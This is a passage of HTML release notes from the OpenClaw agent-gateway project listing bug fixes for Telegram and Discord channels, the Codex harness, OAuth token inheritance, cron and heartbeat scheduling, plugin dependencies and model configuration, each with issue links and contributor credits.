<li>Agents/attribution: send OpenClaw attribution headers on native OpenAI and Codex traffic, including SDK transports, realtime voice and TTS, device-code auth, WHAM usage, and remote embeddings, so PI-origin defaults no longer leak into provider requests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/auth: keep OAuth auth profiles inherited from the main agent read-through instead of copying refresh tokens into secondary agents, and refresh Codex app-server tokens against the owning store so multi-agent swarms avoid reused refresh-token failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347764512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74055/hovercard" href="https://github.com/openclaw/openclaw/issues/74055">#74055</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ClarityInvest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ClarityInvest">@ClarityInvest</a>.</li>
<li>Channels/Telegram: honor <code>ALL_PROXY</code> / <code>all_proxy</code> and service-level <code>OPENCLAW_PROXY_URL</code> when constructing the HTTP/1-only Telegram Bot API transport, so Windows and service installs that rely on those proxy settings no longer fall back to direct egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347549013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74014/hovercard" href="https://github.com/openclaw/openclaw/issues/74014">#74014</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Telegram: keep raw host/network-unreachable Bot API connect failures non-fatal and route tagged polling uncaught exceptions through the Telegram restart path, so transient reachability failures no longer kill the Gateway or leave long polling stuck. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202091022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60515/hovercard" href="https://github.com/openclaw/openclaw/issues/60515">#60515</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352759456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74540" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74540/hovercard" href="https://github.com/openclaw/openclaw/issues/74540">#74540</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thacid22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thacid22">@thacid22</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ewimsatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ewimsatt">@ewimsatt</a>.</li>
<li>Channels/Telegram: continue polling when <code>deleteWebhook</code> hits a transient network failure but <code>getWebhookInfo</code> confirms no webhook is configured, so startup does not retry cleanup forever after the webhook was already removed. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078467786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47384/hovercard" href="https://github.com/openclaw/openclaw/pull/47384">#47384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clovericbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clovericbot">@clovericbot</a>.</li>
<li>Channels/Telegram: retry native quote replies without <code>reply_parameters.quote</code> when Telegram returns <code>QUOTE_TEXT_INVALID</code>, so stale or truncated quote excerpts no longer drop the whole reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353246635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74581/hovercard" href="https://github.com/openclaw/openclaw/issues/74581">#74581</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Channels/Telegram: apply strict safe-send retry to inbound final replies when grammY wraps a pre-connect failure, while leaving ambiguous plain network envelopes single-shot to avoid duplicate visible messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348834237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74203/hovercard" href="https://github.com/openclaw/openclaw/issues/74203">#74203</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nanli2000cn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nanli2000cn">@nanli2000cn</a>.</li>
<li>Channels/Telegram: surface polling liveness warnings in channel status and doctor when a running long-poller has not completed <code>getUpdates</code> after startup grace or its transport activity is stale, so silent polling failures no longer look clean. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Channels/Telegram: publish webhook runtime state and warn when <code>setWebhook</code> has not completed after startup grace, so webhook-mode accounts no longer look healthy while registration is still failing or retrying. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Telegram: bound native command menu <code>deleteMyCommands</code> and <code>setMyCommands</code> Bot API calls and allow the same timeout-triggered transport fallback retry as other startup control calls, so Windows/WSL network stalls cannot leave command sync hanging behind an otherwise running provider. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>ACP/commands: accept forwarded ACP timeout config controls in the OpenClaw bridge, treat unsupported discard-close controls as recoverable cleanup, and restore native <code>/verbose full</code> plus no-arg status behavior, so Discord command menus and nested ACP turns no longer fail on supported session controls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: interrupt and release native app-server turns that go quiet after an OpenClaw dynamic-tool response without sending <code>turn/completed</code>, so Discord and other chat lanes do not stay stuck in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: bound OpenClaw dynamic tool responses to 30 seconds and fail closed with an explicit tool result when the app-server bridge would otherwise strand the turn in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TUI/status: clear stale <code>streaming</code> footer state when a final event arrives after the active run was already cleared and no tracked runs remain, while preserving concurrent-run ownership and inactive local <code>/btw</code> terminal handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244725441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64825/hovercard" href="https://github.com/openclaw/openclaw/issues/64825">#64825</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244930419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64842/hovercard" href="https://github.com/openclaw/openclaw/pull/64842">#64842</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244936758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64843/hovercard" href="https://github.com/openclaw/openclaw/pull/64843">#64843</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244944537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64847" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64847/hovercard" href="https://github.com/openclaw/openclaw/pull/64847">#64847</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244992206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64862" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64862/hovercard" href="https://github.com/openclaw/openclaw/pull/64862">#64862</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Channels/Discord: fail startup closed when Discord cannot resolve the bot's own identity and keep mention gating active when only configured mention patterns can detect mentions, so the provider no longer continues with a missing bot id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052146259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42219" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42219/hovercard" href="https://github.com/openclaw/openclaw/issues/42219">#42219</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077562944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46856/hovercard" href="https://github.com/openclaw/openclaw/pull/46856">#46856</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090797830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49218/hovercard" href="https://github.com/openclaw/openclaw/pull/49218">#49218</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/education-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/education-01">@education-01</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Channels/Discord: split long CJK replies at punctuation and code-point-safe fallback boundaries so Discord chunking stays readable without corrupting astral characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037445222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38597" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38597/hovercard" href="https://github.com/openclaw/openclaw/issues/38597">#38597</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326906134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71384/hovercard" href="https://github.com/openclaw/openclaw/pull/71384">#71384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>TUI: keep the streaming watchdog alive across active tool/lifecycle proof-of-life, pause it during disconnects, and reload history after stale reconnect runs so long-running chats stop flipping to false idle or hanging on stale streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291861236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69081/hovercard" href="https://github.com/openclaw/openclaw/issues/69081">#69081</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EenvoudJasper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EenvoudJasper">@EenvoudJasper</a>.</li>
<li>Browser/gateway: ignore Playwright dialog-close races from <code>Page.handleJavaScriptDialog</code> so browser automation no longer crashes the Gateway when a dialog disappears before Playwright accepts it. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041670448" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/40067/hovercard" href="https://github.com/openclaw/openclaw/pull/40067">#40067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randyjtw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randyjtw">@randyjtw</a>.</li>
<li>Cron/Gateway: defer missed isolated agent-turn catch-up out of the channel startup window, so overdue cron work cannot starve Discord or Telegram while providers connect after a restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat/cron: defer heartbeat turns while cron work is active or queued, add opt-in <code>heartbeat.skipWhenBusy</code> for subagent/nested lane pressure, and retry busy skips without advancing the schedule so local Ollama hosts do not run heartbeat and cron prompts concurrently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105361592" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50773" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50773/hovercard" href="https://github.com/openclaw/openclaw/issues/50773">#50773</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</li>
<li>Agents/thinking: honor configured model <code>compat.supportedReasoningEfforts</code> entries that include <code>xhigh</code>, so custom OpenAI-compatible provider refs expose and validate <code>/think xhigh</code> consistently across command menus, Gateway sessions, agent CLI, and <code>llm-task</code>. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087419491" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48904" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48904/hovercard" href="https://github.com/openclaw/openclaw/pull/48904">#48904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Milchstrassse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Milchstrassse">@Milchstrassse</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wufunc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wufunc">@wufunc</a>.</li>
<li>Vercel AI Gateway: expose provider-owned <code>/think xhigh</code> for trusted OpenAI/Codex upstream refs and Claude adaptive thinking for Anthropic upstream refs, while leaving untrusted namespaced refs on base levels. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048650454" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41561" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41561/hovercard" href="https://github.com/openclaw/openclaw/pull/41561">#41561</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zcg2021/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zcg2021">@Zcg2021</a>.</li>
<li>Plugins/runtime-deps: prune stale <code>openclaw-unknown-*</code> bundled runtime dependency roots during Gateway startup while keeping recent or locked roots, so old staging debris cannot keep growing across restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/runtime-deps: include ten more root-package runtime dependencies (<code>@agentclientprotocol/sdk</code>, <code>@lydell/node-pty</code>, <code>croner</code>, <code>dotenv</code>, <code>jiti</code>, <code>json5</code>, <code>jszip</code>, <code>markdown-it</code>, <code>tar</code>, <code>web-push</code>) in <code>MIRRORED_CORE_RUNTIME_DEP_NAMES</code> so they are mirrored into the runtime-deps tree alongside <code>semver</code> and <code>tslog</code>, preventing <code>Cannot find package 'X'</code> failures from core dist code (for example <code>qmd-manager</code>, <code>cron/schedule</code>, <code>infra/archive</code>, <code>infra/push-web</code>, <code>infra/backup-create</code>, <code>process/supervisor/adapters/pty</code>) when no enabled extension owns the dependency. Adds a static drift guard test that scans <code>src/</code> for value imports of root-package deps and fails CI when one is missing from the mirror allowlist or extension-owned set. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348806638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74199" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74199/hovercard" href="https://github.com/openclaw/openclaw/issues/74199">#74199</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxpuppet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxpuppet">@maxpuppet</a>.</li>
<li>Ollama: compose caller abort signals with guarded-fetch timeouts for native <code>/api/chat</code> streams, so <code>/stop</code> and early cancellation still interrupt local Ollama requests that also carry provider timeout budgets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348337046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74133/hovercard" href="https://github.com/openclaw/openclaw/pull/74133">#74133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Doctor/TTS: migrate legacy <code>messages.tts.enabled</code>, agent TTS, channel TTS, and voice-call plugin TTS toggles to <code>auto</code> mode during <code>openclaw doctor --fix</code>, matching the documented TTS config contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/logs: fall back to the configured Gateway file log when implicit loopback Gateway connections close or time out before or during <code>logs.tail</code>, so <code>openclaw logs</code> still works while diagnosing local-model Gateway disconnects. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347954374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74078" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74078/hovercard" href="https://github.com/openclaw/openclaw/issues/74078">#74078</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sakalaboator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sakalaboator">@sakalaboator</a>.</li>
<li>MCP/plugins: stringify non-array plugin tool results with chat-content coercion instead of default object stringification, so MCP callers receive useful JSON/text content from plugin tools. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory/QMD: make gateway-start QMD refresh opt-in via <code>memory.qmd.update.startup</code>, keep normal memory access lazy, preserve interactive file watching, and align watcher dependency/build ignores with QMD's scanner so cold gateway startup no longer imports or initializes QMD by default. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Channels/Discord: remove Discord-owned queued-run timeout replies through the shared channel lifecycle queue while preserving message ordering and compatibility timeout constants, so long Discord turns stay governed by session/tool/runtime lifecycle instead of channel fallback errors. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codexGW/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codexGW">@codexGW</a>.</li>
<li>Agents/tools: clamp <code>process.poll</code> waits to 30 seconds, advertise that cap in the tool schema, and honor abort signals while waiting, so long command polls cannot pin agent responsiveness after cancellation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: add tracked Discord component-message helpers and a Telegram account-resolution compatibility facade, so existing plugins using those subpaths resolve while new plugins stay on generic channel SDK contracts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Shared labels: preserve Unicode combining marks and NFC-equivalent accented text in group/channel slug normalization so non-Latin labels no longer lose meaningful characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185745477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58932" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58932/hovercard" href="https://github.com/openclaw/openclaw/issues/58932">#58932</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4185851212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58942" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58942/hovercard" href="https://github.com/openclaw/openclaw/pull/58942">#58942</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186444405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58995/hovercard" href="https://github.com/openclaw/openclaw/pull/58995">#58995</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fengqing-git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fengqing-git">@fengqing-git</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Starhappysh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Starhappysh">@Starhappysh</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koen666/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koen666">@koen666</a>.</li>
<li>Channels/Telegram: include probed video width and height when sending regular Telegram videos, so portrait clips render with the correct orientation instead of being stretched by clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3950913740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/18915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/18915/hovercard" href="https://github.com/openclaw/openclaw/pull/18915">#18915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/storyarcade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/storyarcade">@storyarcade</a>.</li>
<li>Docs/Hetzner: clarify that SSH tunnel access requires <code>AllowTcpForwarding local</code> before running <code>ssh -L</code>, so hardened VPS sshd configs do not block loopback Gateway access. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136710669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54557" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54557/hovercard" href="https://github.com/openclaw/openclaw/issues/54557">#54557</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4136836006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54564" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54564/hovercard" href="https://github.com/openclaw/openclaw/pull/54564">#54564</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4141007846" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54954" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54954/hovercard" href="https://github.com/openclaw/openclaw/pull/54954">#54954</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/satishkc7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/satishkc7">@satishkc7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/blackstrype/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/blackstrype">@blackstrype</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Aftabbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Aftabbs">@Aftabbs</a>.</li>
<li>Agents/config: preserve authored <code>agents.defaults.params</code> and per-model <code>agents.defaults.models[].params</code> during narrowed internal config writes, so OpenAI transport overrides such as <code>transport: "sse"</code> and <code>openaiWsWarmup: false</code> are not stripped from <code>openclaw.json</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344027749" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73607/hovercard" href="https://github.com/openclaw/openclaw/issues/73607">#73607</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>.</li>
<li>Agents/model config: resolve per-model extra params through canonical model keys while preserving legacy double-prefixed fallback entries, so provider-prefixed model ids such as <code>openrouter/auto</code> keep their configured runtime params. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4066560428" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44319" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44319/hovercard" href="https://github.com/openclaw/openclaw/pull/44319">#44319</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenryXiaoYang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenryXiaoYang">@HenryXiaoYang</a>.</li>
